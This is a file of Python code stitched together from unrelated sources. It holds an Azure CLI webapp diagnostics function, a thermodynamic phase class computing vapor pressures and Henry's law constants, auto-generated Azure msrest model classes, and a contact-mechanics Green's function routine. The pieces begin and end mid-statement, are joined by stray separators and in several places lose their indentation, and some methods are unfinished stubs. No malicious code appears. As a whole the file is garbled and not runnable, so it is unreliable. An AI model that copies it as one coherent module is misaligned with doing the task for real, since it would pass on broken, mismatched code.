    url = ('https' if ssl_host else 'http') + '://' + url
    webbrowser.open(url, new=2) # 2 means: open in a new tab, if possible
#TODO: expose new blob suport
def config_diagnostics(resource_group_name, name, level=None,
                       application_logging=None, web_server_logging=None,
                       detailed_error_messages=None, failed_request_tracing=None,
                       slot=None):
    """Configure filesystem diagnostics logging; only the categories the
    caller supplied are changed (None leaves a category untouched)."""
    from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
                                       SiteLogsConfig, HttpLogsConfig,
                                       FileSystemHttpLogsConfig, EnabledConfig)
    client = web_client_factory()
    #TODO: ensure we call get_site only once
    site = client.sites.get_site(resource_group_name, name)
    location = site.location
    application_logs = None
    if application_logging is not None:
        # disabling is expressed as level 'Off'; default enabled level is 'Error'
        if not application_logging:
            level = 'Off'
        elif level is None:
            level = 'Error'
        fs_log = FileSystemApplicationLogsConfig(level)
        application_logs = ApplicationLogsConfig(fs_log)
    http_logs = None
    if web_server_logging is not None:
        enabled = web_server_logging
        #100 mb max log size, retenting last 3 days. Yes we hard code it, portal does too
        fs_server_log = FileSystemHttpLogsConfig(100, 3, enabled)
        http_logs = HttpLogsConfig(fs_server_log)
    detailed_error_messages_logs = (None if detailed_error_messages is None
                                    else EnabledConfig(detailed_error_messages))
    failed_request_tracing_logs = (None if failed_request_tracing is None
                                   else EnabledConfig(failed_request_tracing))
    site_log_config = SiteLogsConfig(location,
                                     application_logs=application_logs,
                                     http_logs=http_logs,
                                     failed_requests_tracing=failed_request_tracing_logs,
                                     detailed_error_messages=detailed_error_messages_logs)
    return _generic_site_operation(resource_group_name, name, 'update_site_logs_config',
                                   slot, site_log_config)
def config_slot_auto_swap(resource_group_name, | |
IdealSolution) and not self.has_henry_components
self.Hfs = Hfs
self.Gfs = Gfs
self.Sfs = Sfs
if T is not None and P is not None and zs is not None:
self.T = T
self.P = P
self.zs = zs
def to_TP_zs(self, T, P, zs):
T_equal = hasattr(self, 'T') and T == self.T
new = self.__class__.__new__(self.__class__)
new.T = T
new.P = P
new.zs = zs
new.N = self.N
new.cmps = self.cmps
self.transfer_data(new, zs, T, T_equal)
return new
    def to(self, zs, T=None, P=None, V=None):
        """Return a copy of this phase at new conditions; exactly two of
        T, P, V must be given. A specified V is converted to P (at fixed T)
        or T (at fixed P) by secant iteration on the phase volume."""
        try:
            T_equal = T == self.T
        except:
            T_equal = False
        new = self.__class__.__new__(self.__class__)
        new.zs = zs
        new.N = self.N
        new.cmps = self.cmps
        if T is not None:
            if P is not None:
                new.T = T
                new.P = P
            elif V is not None:
                # solve for the P whose volume matches V at this T
                # (initial guess 0.0002 -- presumably Pa; TODO confirm suitability)
                def to_solve(P):
                    return self.to_TP_zs(T, P, zs).V() - V
                P = secant(to_solve, 0.0002, xtol=1e-8, ytol=1e-10)
                new.P = P
        elif P is not None and V is not None:
            # solve for the T whose volume matches V at this P
            def to_solve(T):
                return self.to_TP_zs(T, P, zs).V() - V
            T = secant(to_solve, 300, xtol=1e-9, ytol=1e-5)
            new.T = T
        else:
            raise ValueError("Two of T, P, or V are needed")
        self.transfer_data(new, zs, T, T_equal)
        return new
    def transfer_data(self, new, zs, T, T_equal):
        """Copy correlation objects, fitted-coefficient caches and option flags
        onto ``new``; when T (and, where required, composition) is unchanged,
        also carry over cached temperature-dependent property lists."""
        new.VaporPressures = self.VaporPressures
        new.VolumeLiquids = self.VolumeLiquids
        new.eos_pure_instances = self.eos_pure_instances
        new.HeatCapacityGases = self.HeatCapacityGases
        new.EnthalpyVaporizations = self.EnthalpyVaporizations
        new.HeatCapacityLiquids = self.HeatCapacityLiquids
        new.Psats_locked = self.Psats_locked
        new._Psats_data = self._Psats_data
        new.Cpgs_locked = self.Cpgs_locked
        new._Cpgs_data = self._Cpgs_data
        new.Cpls_locked = self.Cpls_locked
        new._Cpls_data = self._Cpls_data
        new.Vms_sat_locked = self.Vms_sat_locked
        new._Vms_sat_data = self._Vms_sat_data
        new._Hvap_data = self._Hvap_data
        new.Hvap_locked = self.Hvap_locked
        new.incompressible = self.incompressible
        new.use_phis_sat = self.use_phis_sat
        new.use_Poynting = self.use_Poynting
        new.P_DEPENDENT_H_LIQ = self.P_DEPENDENT_H_LIQ
        new.use_IG_Cp = self.use_IG_Cp
        new.use_eos_volume = self.use_eos_volume
        new.Hfs = self.Hfs
        new.Gfs = self.Gfs
        new.Sfs = self.Sfs
        new.henry_data = self.henry_data
        new.henry_components = self.henry_components
        new.has_henry_components = self.has_henry_components
        new.composition_independent = self.composition_independent
        new.use_Tait = self.use_Tait
        new._Tait_B_data = self._Tait_B_data
        new._Tait_C_data = self._Tait_C_data
        if T_equal and (self.composition_independent or self.zs is zs):
            # Allow the composition inconsistency as it is harmless
            new.GibbsExcessModel = self.GibbsExcessModel
        else:
            new.GibbsExcessModel = self.GibbsExcessModel.to_T_xs(T=T, xs=zs)
        # Opportunistically reuse cached T-dependent values; each cache may or
        # may not exist yet, hence the per-cache try/except blocks.
        try:
            if T_equal:
                if not self.has_henry_components:
                    try:
                        new._Psats = self._Psats
                        new._dPsats_dT = self._dPsats_dT
                        new._d2Psats_dT2 = self._d2Psats_dT2
                    except:
                        pass
                try:
                    new._Vms_sat = self._Vms_sat
                    new._Vms_sat_dT = self._Vms_sat_dT
                    new._d2Vms_sat_dT2 = self._d2Vms_sat_dT2
                except:
                    pass
                try:
                    new._Cpigs = self._Cpigs
                except:
                    pass
                try:
                    new._Cpig_integrals_over_T_pure = self._Cpig_integrals_over_T_pure
                except:
                    pass
                try:
                    new._Cpig_integrals_pure = self._Cpig_integrals_pure
                except:
                    pass
        except:
            pass
        return new
    def Henry_matrix(self):
        '''Generate a matrix of all component-solvent Henry's law values
        Shape N*N; solvent/solvent and gas/gas values are all None, as well
        as solvent/gas values where the parameters are unavailable.

        NOTE(review): not implemented yet - the body is only this docstring,
        so calling this method currently returns None.
        '''
    def Henry_constants(self):
        '''Mix the parameters in `Henry_matrix` into values to take the place
        in Psats.

        NOTE(review): not implemented yet - the body is only this docstring,
        so calling this method currently returns None.
        '''
def Psats_T_ref(self):
try:
return self._Psats_T_ref
except AttributeError:
pass
VaporPressures, cmps = self.VaporPressures, self.cmps
T_REF_IG = self.T_REF_IG
self._Psats_T_ref = [VaporPressures[i](T_REF_IG) for i in cmps]
return self._Psats_T_ref
def Psats_at(self, T):
if self.Psats_locked:
return self._Psats_at_locked(T, self._Psats_data, self.cmps)
VaporPressures = self.VaporPressures
return [VaporPressures[i](T) for i in self.cmps]
@staticmethod
def _Psats_at_locked(T, Psats_data, cmps):
Psats = []
T_inv = 1.0/T
logT = log(T)
Tmins, Tmaxes, coeffs = Psats_data[0], Psats_data[3], Psats_data[6]
for i in cmps:
if T < Tmins[i]:
A, B, C = Psats_data[9][i]
Psat = (A + B*T_inv + C*logT)
# A, B = _Psats_data[9][i]
# Psat = (A - B*T_inv)
# Psat = (T - Tmins[i])*_Psats_data[1][i] + _Psats_data[2][i]
elif T > Tmaxes[i]:
A, B, C = Psats_data[10][i]
Psat = (A + B*T_inv + C*logT)
# A, B = _Psats_data[10][i]
# Psat = (A - B*T_inv)
# Psat = (T - Tmaxes[i])*_Psats_data[4][i] + _Psats_data[5][i]
else:
Psat = 0.0
for c in coeffs[i]:
Psat = Psat*T + c
try:
Psats.append(exp(Psat))
except:
Psats.append(1.6549840276802644e+300)
return Psats
    def Psats(self):
        """Return (and cache) the pure-component vapor pressures [Pa] at the
        phase temperature `self.T`.

        For components flagged in `henry_components`, the vapor-pressure slot
        is instead filled with a mixed Henry's law constant computed from the
        solvent parameters in `henry_data`.
        """
        try:
            # Cached result from a previous call
            return self._Psats
        except AttributeError:
            pass
        T, cmps = self.T, self.cmps
        if self.Psats_locked:
            # Fast path: evaluate the precomputed polynomial fits
            self._Psats = Psats = self._Psats_at_locked(T, self._Psats_data, cmps)
            return Psats
        self._Psats = Psats = []
        for i in self.VaporPressures:
            Psats.append(i.T_dependent_property(T))
        if self.has_henry_components:
            henry_components = self.henry_components
            henry_data = self.henry_data
            cmps = self.cmps
            zs = self.zs
            for i in cmps:
                # NOTE(review): hard-coded critical volumes for a specific
                # 3-component system; together with the "WORKING" marker
                # below this branch looks unfinished - confirm before relying
                # on it for other systems.
                Vcs = [5.6000000000000006e-05, 0.000168, 7.340000000000001e-05]
                if henry_components[i]:
                    # WORKING - Need a bunch of conversions of data in terms of other values
                    # into this basis
                    d = henry_data[i]
                    z_sum = 0.0
                    logH = 0.0
                    for j in cmps:
                        if d[j]:
                            r = d[j]
                            t = T
                            # log of the Henry constant of solute i in solvent j
                            log_Hi = (r[0] + r[1]/t + r[2]*log(t) + r[3]*t + r[4]/t**2)
                            # Critical-volume-weighted mixing of the solvent contributions
                            wi = zs[j]*Vcs[j]**(2.0/3.0)/sum([zs[_]*Vcs[_]**(2.0/3.0) for _ in cmps if d[_]])
                            logH += wi*log_Hi
                            z_sum += zs[j]
                    # NOTE(review): the accumulated z_sum is discarded here
                    z_sum = 1
                    Psats[i] = exp(logH/z_sum)*1e5 # bar to Pa
        return Psats
# def PIP(self):
# # Force liquid
# return 2.0
@staticmethod
def _dPsats_dT_at_locked(T, Psats_data, cmps, Psats):
T_inv = 1.0/T
Tinv2 = T_inv*T_inv
dPsats_dT = []
Tmins, Tmaxes, dcoeffs, coeffs_low, coeffs_high = Psats_data[0], Psats_data[3], Psats_data[7], Psats_data[9], Psats_data[10]
for i in cmps:
if T < Tmins[i]:
# A, B = _Psats_data[9][i]
# dPsat_dT = B*Tinv2*Psats[i]
dPsat_dT = Psats[i]*(-coeffs_low[i][1]*Tinv2 + coeffs_low[i][2]*T_inv)
# dPsat_dT = _Psats_data[1][i]*Psats[i]#*exp((T - Tmins[i])*_Psats_data[1][i]
# + _Psats_data[2][i])
elif T > Tmaxes[i]:
dPsat_dT = Psats[i]*(-coeffs_high[i][1]*Tinv2 + coeffs_high[i][2]*T_inv)
# dPsat_dT = _Psats_data[4][i]*Psats[i]#*exp((T - Tmaxes[i])
# #*_Psats_data[4][i]
# #+ _Psats_data[5][i])
else:
dPsat_dT = 0.0
for c in dcoeffs[i]:
dPsat_dT = dPsat_dT*T + c
# v, der = horner_and_der(coeffs[i], T)
dPsat_dT *= Psats[i]
dPsats_dT.append(dPsat_dT)
return dPsats_dT
def dPsats_dT_at(self, T, Psats=None):
if Psats is None:
Psats = self.Psats_at(T)
if self.Psats_locked:
return self._dPsats_dT_at_locked(T, self._Psats_data, self.cmps, Psats)
return [VaporPressure.T_dependent_property_derivative(T=T)
for VaporPressure in self.VaporPressures]
def dPsats_dT(self):
try:
return self._dPsats_dT
except:
pass
T, cmps = self.T, self.cmps
# Need to reset the method because for the T bounded solver,
# will normally get a different than prefered method as it starts
# at the boundaries
if self.Psats_locked:
try:
Psats = self._Psats
except AttributeError:
Psats = self.Psats()
self._dPsats_dT = dPsats_dT = self._dPsats_dT_at_locked(T, self._Psats_data, cmps, Psats)
return dPsats_dT
self._dPsats_dT = dPsats_dT = [VaporPressure.T_dependent_property_derivative(T=T)
for VaporPressure in self.VaporPressures]
return dPsats_dT
    def d2Psats_dT2(self):
        """Return (and cache) the second temperature derivatives of the
        pure-component vapor pressures [Pa/K^2] at `self.T`.
        """
        try:
            # Cached result from a previous call
            return self._d2Psats_dT2
        except:
            pass
        try:
            Psats = self._Psats
        except AttributeError:
            Psats = self.Psats()
        try:
            dPsats_dT = self._dPsats_dT
        except AttributeError:
            dPsats_dT = self.dPsats_dT()
        T, cmps = self.T, self.cmps
        T_inv = 1.0/T
        T_inv2 = T_inv*T_inv
        # NOTE(review): Tinv3 is computed but never used below
        Tinv3 = T_inv*T_inv*T_inv
        self._d2Psats_dT2 = d2Psats_dT2 = []
        if self.Psats_locked:
            Psats_data = self._Psats_data
            Tmins, Tmaxes, d2coeffs = Psats_data[0], Psats_data[3], Psats_data[8]
            for i in cmps:
                if T < Tmins[i]:
                    # Analytic d2/dT2 of exp(A + B/T + C*ln T), low-T extrapolation
                    A, B, C = Psats_data[9][i]
                    x0 = (B*T_inv - C)
                    d2Psat_dT2 = Psats[i]*(2.0*B*T_inv - C + x0*x0)*T_inv2
                elif T > Tmaxes[i]:
                    # Same analytic form with the high-T extrapolation constants
                    A, B, C = Psats_data[10][i]
                    x0 = (B*T_inv - C)
                    d2Psat_dT2 = Psats[i]*(2.0*B*T_inv - C + x0*x0)*T_inv2
                else:
                    # Horner evaluation of the fitted polynomial, then combined
                    # as Psat*poly + (dPsat/dT)^2/Psat; consistent with
                    # P = exp(f(T)): P'' = P*f'' + (P')^2/P
                    d2Psat_dT2 = 0.0
                    for c in d2coeffs[i]:
                        d2Psat_dT2 = d2Psat_dT2*T + c
                    d2Psat_dT2 = (dPsats_dT[i]*dPsats_dT[i]/Psats[i] + Psats[i]*d2Psat_dT2)
                d2Psats_dT2.append(d2Psat_dT2)
            return d2Psats_dT2
        self._d2Psats_dT2 = d2Psats_dT2 = [VaporPressure.T_dependent_property_derivative(T=T, n=2)
                                           for VaporPressure in self.VaporPressures]
        return d2Psats_dT2
def lnPsats(self):
try:
return self._lnPsats
except AttributeError:
pass
T, cmps = self.T, self.cmps
T_inv = 1.0/T
logT = log(T)
lnPsats = []
if self.Psats_locked:
Psats_data = self._Psats_data
Tmins, Tmaxes, coeffs = Psats_data[0], Psats_data[3], Psats_data[6]
for i in cmps:
if T < Tmins[i]:
A, B, C = Psats_data[9][i]
Psat = (A + B*T_inv + C*logT)
elif T > Tmaxes[i]:
A, B, C = Psats_data[10][i]
Psat = (A + B*T_inv + C*logT)
# Psat = (T - Tmaxes[i])*_Psats_data[4][i] + _Psats_data[5][i]
else:
Psat = 0.0
for c in coeffs[i]:
Psat = Psat*T + c
lnPsats.append(Psat)
self._lnPsats = lnPsats
return lnPsats
self._lnPsats = [log(i) for i in self.Psats()]
return self._lnPsats
def dlnPsats_dT(self):
T, cmps = self.T, self.cmps
T_inv = 1.0/T
Tinv2 = T_inv*T_inv
if self.Psats_locked:
Psats_data = self._Psats_data
Tmins, Tmaxes, dcoeffs = Psats_data[0], Psats_data[3], Psats_data[7]
dlnPsats_dT = []
for i in cmps:
if T < Tmins[i]:
A, B, C = Psats_data[9][i]
dPsat_dT | |
of the Traffic Manager profile to use, if
it exists. Traffic Manager resource ID is of the form
/subscriptions/{subId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/trafficManagerProfiles/{profileName}.
:paramtype traffic_manager_profile_id: str
:keyword traffic_manager_profile_name: Name of Traffic Manager profile to create. This is only
needed if Traffic Manager profile does not already exist.
:paramtype traffic_manager_profile_name: str
:keyword ignore_quotas: :code:`<code>true</code>` if quotas should be ignored; otherwise,
:code:`<code>false</code>`.
:paramtype ignore_quotas: bool
"""
super(CloningInfo, self).__init__(**kwargs)
self.correlation_id = correlation_id
self.overwrite = overwrite
self.clone_custom_host_names = clone_custom_host_names
self.clone_source_control = clone_source_control
self.source_web_app_id = source_web_app_id
self.hosting_environment = hosting_environment
self.app_settings_overrides = app_settings_overrides
self.configure_load_balancing = configure_load_balancing
self.traffic_manager_profile_id = traffic_manager_profile_id
self.traffic_manager_profile_name = traffic_manager_profile_name
self.ignore_quotas = ignore_quotas
class ConnStringInfo(msrest.serialization.Model):
    """Database connection string information.

    :ivar name: Name of connection string.
    :vartype name: str
    :ivar connection_string: Connection string value.
    :vartype connection_string: str
    :ivar type: Type of database. Possible values include: "MySql", "SQLServer", "SQLAzure",
     "Custom", "NotificationHub", "ServiceBus", "EventHub", "ApiHub", "DocDb", "RedisCache",
     "PostgreSQL".
    :vartype type: str or ~azure.mgmt.web.v2016_09_01.models.ConnectionStringType
    """

    # Maps Python attribute names to their JSON wire names and msrest types
    # for (de)serialization.
    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'connection_string': {'key': 'connectionString', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
    }
    def __init__(
        self,
        *,
        name: Optional[str] = None,
        connection_string: Optional[str] = None,
        type: Optional[Union[str, "ConnectionStringType"]] = None,
        **kwargs
    ):
        """
        :keyword name: Name of connection string.
        :paramtype name: str
        :keyword connection_string: Connection string value.
        :paramtype connection_string: str
        :keyword type: Type of database. Possible values include: "MySql", "SQLServer", "SQLAzure",
         "Custom", "NotificationHub", "ServiceBus", "EventHub", "ApiHub", "DocDb", "RedisCache",
         "PostgreSQL".
        :paramtype type: str or ~azure.mgmt.web.v2016_09_01.models.ConnectionStringType
        """
        super(ConnStringInfo, self).__init__(**kwargs)
        self.name = name
        self.connection_string = connection_string
        self.type = type
class CorsSettings(msrest.serialization.Model):
    """Cross-Origin Resource Sharing (CORS) settings for the app.

    :ivar allowed_origins: Gets or sets the list of origins that should be allowed to make
     cross-origin
     calls (for example: http://example.com:12345). Use "*" to allow all.
    :vartype allowed_origins: list[str]
    """

    # Maps Python attribute names to their JSON wire names and msrest types
    # for (de)serialization.
    _attribute_map = {
        'allowed_origins': {'key': 'allowedOrigins', 'type': '[str]'},
    }
    def __init__(
        self,
        *,
        allowed_origins: Optional[List[str]] = None,
        **kwargs
    ):
        """
        :keyword allowed_origins: Gets or sets the list of origins that should be allowed to make
         cross-origin
         calls (for example: http://example.com:12345). Use "*" to allow all.
        :paramtype allowed_origins: list[str]
        """
        super(CorsSettings, self).__init__(**kwargs)
        self.allowed_origins = allowed_origins
class CsmUsageQuota(msrest.serialization.Model):
    """Usage of the quota resource.

    :ivar unit: Units of measurement for the quota resource.
    :vartype unit: str
    :ivar next_reset_time: Next reset time for the resource counter.
    :vartype next_reset_time: ~datetime.datetime
    :ivar current_value: The current value of the resource counter.
    :vartype current_value: long
    :ivar limit: The resource limit.
    :vartype limit: long
    :ivar name: Quota name.
    :vartype name: ~azure.mgmt.web.v2016_09_01.models.LocalizableString
    """

    # Maps Python attribute names to their JSON wire names and msrest types
    # for (de)serialization.
    _attribute_map = {
        'unit': {'key': 'unit', 'type': 'str'},
        'next_reset_time': {'key': 'nextResetTime', 'type': 'iso-8601'},
        'current_value': {'key': 'currentValue', 'type': 'long'},
        'limit': {'key': 'limit', 'type': 'long'},
        'name': {'key': 'name', 'type': 'LocalizableString'},
    }
    def __init__(
        self,
        *,
        unit: Optional[str] = None,
        next_reset_time: Optional[datetime.datetime] = None,
        current_value: Optional[int] = None,
        limit: Optional[int] = None,
        name: Optional["LocalizableString"] = None,
        **kwargs
    ):
        """
        :keyword unit: Units of measurement for the quota resource.
        :paramtype unit: str
        :keyword next_reset_time: Next reset time for the resource counter.
        :paramtype next_reset_time: ~datetime.datetime
        :keyword current_value: The current value of the resource counter.
        :paramtype current_value: long
        :keyword limit: The resource limit.
        :paramtype limit: long
        :keyword name: Quota name.
        :paramtype name: ~azure.mgmt.web.v2016_09_01.models.LocalizableString
        """
        super(CsmUsageQuota, self).__init__(**kwargs)
        self.unit = unit
        self.next_reset_time = next_reset_time
        self.current_value = current_value
        self.limit = limit
        self.name = name
class CsmUsageQuotaCollection(msrest.serialization.Model):
    """Collection of CSM usage quotas.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :ivar value: Required. Collection of resources.
    :vartype value: list[~azure.mgmt.web.v2016_09_01.models.CsmUsageQuota]
    :ivar next_link: Link to next page of resources.
    :vartype next_link: str
    """

    # msrest validation rules: `value` must be supplied; `next_link` is
    # server-populated and read-only.
    _validation = {
        'value': {'required': True},
        'next_link': {'readonly': True},
    }
    # Maps Python attribute names to their JSON wire names and msrest types
    # for (de)serialization.
    _attribute_map = {
        'value': {'key': 'value', 'type': '[CsmUsageQuota]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }
    def __init__(
        self,
        *,
        value: List["CsmUsageQuota"],
        **kwargs
    ):
        """
        :keyword value: Required. Collection of resources.
        :paramtype value: list[~azure.mgmt.web.v2016_09_01.models.CsmUsageQuota]
        """
        super(CsmUsageQuotaCollection, self).__init__(**kwargs)
        self.value = value
        # Read-only (see _validation); filled in from server responses only.
        self.next_link = None
class ErrorEntity(msrest.serialization.Model):
    """Body of the error response returned from the API.

    :ivar extended_code: Type of error.
    :vartype extended_code: str
    :ivar message_template: Message template.
    :vartype message_template: str
    :ivar parameters: Parameters for the template.
    :vartype parameters: list[str]
    :ivar inner_errors: Inner errors.
    :vartype inner_errors: list[~azure.mgmt.web.v2016_09_01.models.ErrorEntity]
    :ivar code: Basic error code.
    :vartype code: str
    :ivar message: Any details of the error.
    :vartype message: str
    """

    # Maps Python attribute names to their JSON wire names and msrest types
    # for (de)serialization. Note the recursive [ErrorEntity] for nested errors.
    _attribute_map = {
        'extended_code': {'key': 'extendedCode', 'type': 'str'},
        'message_template': {'key': 'messageTemplate', 'type': 'str'},
        'parameters': {'key': 'parameters', 'type': '[str]'},
        'inner_errors': {'key': 'innerErrors', 'type': '[ErrorEntity]'},
        'code': {'key': 'code', 'type': 'str'},
        'message': {'key': 'message', 'type': 'str'},
    }
    def __init__(
        self,
        *,
        extended_code: Optional[str] = None,
        message_template: Optional[str] = None,
        parameters: Optional[List[str]] = None,
        inner_errors: Optional[List["ErrorEntity"]] = None,
        code: Optional[str] = None,
        message: Optional[str] = None,
        **kwargs
    ):
        """
        :keyword extended_code: Type of error.
        :paramtype extended_code: str
        :keyword message_template: Message template.
        :paramtype message_template: str
        :keyword parameters: Parameters for the template.
        :paramtype parameters: list[str]
        :keyword inner_errors: Inner errors.
        :paramtype inner_errors: list[~azure.mgmt.web.v2016_09_01.models.ErrorEntity]
        :keyword code: Basic error code.
        :paramtype code: str
        :keyword message: Any details of the error.
        :paramtype message: str
        """
        super(ErrorEntity, self).__init__(**kwargs)
        self.extended_code = extended_code
        self.message_template = message_template
        self.parameters = parameters
        self.inner_errors = inner_errors
        self.code = code
        self.message = message
class Experiments(msrest.serialization.Model):
    """Routing rules in production experiments.

    :ivar ramp_up_rules: List of ramp-up rules.
    :vartype ramp_up_rules: list[~azure.mgmt.web.v2016_09_01.models.RampUpRule]
    """

    # Maps Python attribute names to their JSON wire names and msrest types
    # for (de)serialization.
    _attribute_map = {
        'ramp_up_rules': {'key': 'rampUpRules', 'type': '[RampUpRule]'},
    }
    def __init__(
        self,
        *,
        ramp_up_rules: Optional[List["RampUpRule"]] = None,
        **kwargs
    ):
        """
        :keyword ramp_up_rules: List of ramp-up rules.
        :paramtype ramp_up_rules: list[~azure.mgmt.web.v2016_09_01.models.RampUpRule]
        """
        super(Experiments, self).__init__(**kwargs)
        self.ramp_up_rules = ramp_up_rules
class HandlerMapping(msrest.serialization.Model):
    """The IIS handler mappings used to define which handler processes HTTP requests with certain extension.
    For example, it is used to configure php-cgi.exe process to handle all HTTP requests with *.php extension.

    :ivar extension: Requests with this extension will be handled using the specified FastCGI
     application.
    :vartype extension: str
    :ivar script_processor: The absolute path to the FastCGI application.
    :vartype script_processor: str
    :ivar arguments: Command-line arguments to be passed to the script processor.
    :vartype arguments: str
    """

    # Maps Python attribute names to their JSON wire names and msrest types
    # for (de)serialization.
    _attribute_map = {
        'extension': {'key': 'extension', 'type': 'str'},
        'script_processor': {'key': 'scriptProcessor', 'type': 'str'},
        'arguments': {'key': 'arguments', 'type': 'str'},
    }
    def __init__(
        self,
        *,
        extension: Optional[str] = None,
        script_processor: Optional[str] = None,
        arguments: Optional[str] = None,
        **kwargs
    ):
        """
        :keyword extension: Requests with this extension will be handled using the specified FastCGI
         application.
        :paramtype extension: str
        :keyword script_processor: The absolute path to the FastCGI application.
        :paramtype script_processor: str
        :keyword arguments: Command-line arguments to be passed to the script processor.
        :paramtype arguments: str
        """
        super(HandlerMapping, self).__init__(**kwargs)
        self.extension = extension
        self.script_processor = script_processor
        self.arguments = arguments
class HostingEnvironmentDiagnostics(msrest.serialization.Model):
    """Diagnostics for an App Service Environment.

    :ivar name: Name/identifier of the diagnostics.
    :vartype name: str
    :ivar diagnosics_output: Diagnostics output.
    :vartype diagnosics_output: str
    """

    # NOTE: "diagnosics" (sic) matches the misspelled wire key
    # 'diagnosicsOutput' in the REST contract; do not "fix" the spelling
    # here or (de)serialization would break.
    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'diagnosics_output': {'key': 'diagnosicsOutput', 'type': 'str'},
    }
    def __init__(
        self,
        *,
        name: Optional[str] = None,
        diagnosics_output: Optional[str] = None,
        **kwargs
    ):
        """
        :keyword name: Name/identifier of the diagnostics.
        :paramtype name: str
        :keyword diagnosics_output: Diagnostics output.
        :paramtype diagnosics_output: str
        """
        super(HostingEnvironmentDiagnostics, self).__init__(**kwargs)
        self.name = name
        self.diagnosics_output = diagnosics_output
class HostingEnvironmentProfile(msrest.serialization.Model):
    """Specification for an App Service Environment to use for this resource.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Resource ID of the App Service Environment.
    :vartype id: str
    :ivar name: Name of the App Service Environment.
    :vartype name: str
    :ivar type: Resource type of the App Service Environment.
    :vartype type: str
    """

    # `name` and `type` are server-populated and read-only; only `id` can be
    # supplied by the caller.
    _validation = {
        'name': {'readonly': True},
        'type': {'readonly': True},
    }
    # Maps Python attribute names to their JSON wire names and msrest types
    # for (de)serialization.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
    }
    def __init__(
        self,
        *,
        id: Optional[str] = None,
        **kwargs
    ):
        """
        :keyword id: Resource ID of the App Service Environment.
        :paramtype id: str
        """
        super(HostingEnvironmentProfile, self).__init__(**kwargs)
        self.id = id
        # Read-only (see _validation); filled in from server responses only.
        self.name = None
        self.type = None
class HostNameSslState(msrest.serialization.Model):
"""SSL-enabled hostname.
:ivar name: Hostname.
:vartype name: str
:ivar ssl_state: SSL type. Possible values include: "Disabled", "SniEnabled", "IpBasedEnabled".
:vartype ssl_state: str or ~azure.mgmt.web.v2016_09_01.models.SslState
:ivar virtual_ip: Virtual IP address assigned to the hostname if IP based SSL is enabled.
:vartype virtual_ip: str
:ivar thumbprint: SSL | |
        fft(u) = w*fft(p), see (6) Stanley & Kato, J. Tribol. 119(3), 481-485
        (Jul 01, 1997).
For the infinite halfspace,
.. math ::
w = q E^* / 2
q is the wavevector (:math:`2 \pi / wavelength`)
WARNING: the paper is dimensionally *incorrect*. see for the correct
1D formulation: Section 13.2 in
        Johnson, K. L. (1985). Contact Mechanics. [Online]. Cambridge:
Cambridge University Press. Available from: Cambridge Books Online
<http://dx.doi.org/10.1017/CBO9781139171731> [Accessed 16 February
2015]
for correct 2D formulation: Appendix 1, eq A.2 in
Johnson, Greenwood and Higginson, "The Contact of Elastic Regular
Wavy surfaces", Int. J. Mech. Sci. Vol. 27 No. 6, pp. 383-396, 1985
<http://dx.doi.org/10.1016/0020-7403(85)90029-3> [Accessed 18 March
2015]
"""
if self.dim == 1:
nx, = self.nb_grid_pts
sx, = self.physical_sizes
# Note: q-values from 0 to 1, not from 0 to 2*pi
qx = np.arange(self.fourier_locations[0],
self.fourier_locations[0] +
self.nb_fourier_grid_pts[0], dtype=np.float64)
qx = np.where(qx <= nx // 2, qx / sx, (nx - qx) / sx)
surface_stiffness = np.pi * self.contact_modulus * qx
if self.stiffness_q0 is None:
surface_stiffness[0] = surface_stiffness[1].real
elif self.stiffness_q0 == 0.0:
surface_stiffness[0] = 1.0
else:
surface_stiffness[0] = self.stiffness_q0
greens_function = 1 / surface_stiffness
if self.fourier_locations == (0,):
if self.stiffness_q0 == 0.0:
greens_function[0, 0] = 0.0
elif self.dim == 2:
if np.prod(self.nb_fourier_grid_pts) == 0:
greens_function = np.zeros(self.nb_fourier_grid_pts, order='f',
dtype=complex)
else:
nx, ny = self.nb_grid_pts
sx, sy = self.physical_sizes
# Note: q-values from 0 to 1, not from 0 to 2*pi
qx = np.arange(self.fourier_locations[0],
self.fourier_locations[0] +
self.nb_fourier_grid_pts[0], dtype=np.float64)
qx = np.where(qx <= nx // 2, qx / sx, (nx - qx) / sx)
qy = np.arange(self.fourier_locations[1],
self.fourier_locations[1] +
self.nb_fourier_grid_pts[1], dtype=np.float64)
qy = np.where(qy <= ny // 2, qy / sy, (ny - qy) / sy)
q = np.sqrt((qx * qx).reshape(-1, 1) +
(qy * qy).reshape(1, -1))
if self.fourier_locations == (0, 0):
q[0, 0] = np.NaN
# q[0,0] has no Impact on the end result,
# but q[0,0] = 0 produces runtime Warnings
# (because corr[0,0]=inf)
surface_stiffness = np.pi * self.contact_modulus * q
# E* / 2 (2 \pi / \lambda)
# (q is 1 / lambda, here)
if self.thickness is not None:
# Compute correction for finite thickness
q *= 2 * np.pi * self.thickness
fac = 3 - 4 * self.poisson
off = 4 * self.poisson * (2 * self.poisson - 3) + 5
with np.errstate(over="ignore", invalid="ignore",
divide="ignore"):
corr = (fac * np.cosh(2 * q) + 2 * q ** 2 + off) / \
(fac * np.sinh(2 * q) - 2 * q)
# The expression easily overflows numerically. These are
# then q-values that are converged to the infinite system
# expression.
corr[np.isnan(corr)] = 1.0
surface_stiffness *= corr
if self.fourier_locations == (0, 0):
surface_stiffness[0, 0] = \
self.young / self.thickness * \
(1 - self.poisson) / ((1 - 2 * self.poisson) *
(1 + self.poisson))
else:
if self.fourier_locations == (0, 0):
if self.stiffness_q0 is None:
surface_stiffness[0, 0] = \
(surface_stiffness[1, 0].real +
surface_stiffness[0, 1].real) / 2
elif self.stiffness_q0 == 0.0:
surface_stiffness[0, 0] = 1.0
else:
surface_stiffness[0, 0] = self.stiffness_q0
greens_function = 1 / surface_stiffness
if self.fourier_locations == (0, 0):
if self.stiffness_q0 == 0.0:
greens_function[0, 0] = 0.0
return greens_function
def _compute_surface_stiffness(self):
"""
Invert the weights w relating fft(displacement) to fft(pressure):
"""
surface_stiffness = np.zeros(self.nb_fourier_grid_pts, order='f',
dtype=complex)
